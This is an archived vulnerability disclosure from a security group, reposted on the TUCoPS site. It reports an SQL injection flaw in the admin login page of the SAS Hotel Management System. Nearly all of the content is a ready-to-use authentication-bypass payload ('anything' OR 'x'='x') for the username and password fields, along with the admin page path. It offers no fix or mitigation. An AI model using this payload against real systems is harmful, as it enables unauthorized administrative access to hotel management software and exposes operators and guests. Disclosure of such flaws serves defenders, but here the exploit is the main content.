TUCoPS :: HP Unsorted S :: tb11976.htm

SAS Hotel Management System SQL Injection
SAS Hotel Management System SQL Injection
SAS Hotel Management System SQL Injection


__________________________

A R I A - S E CU R I T Y  
___________________________

SAS Hotel Management System SQL Injection
http://www.sellatsite.com/sellatsite/hotel.asp 


Explanation:

http://path/admin/admin.asp 

Username: anything' OR 'x'='x
password: anything' OR 'x'='x



Credits: Aria-Security Team
http://aria-security.net 
http://outlaw.Aria-Security.net/ [PERSONAL BLOG]

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH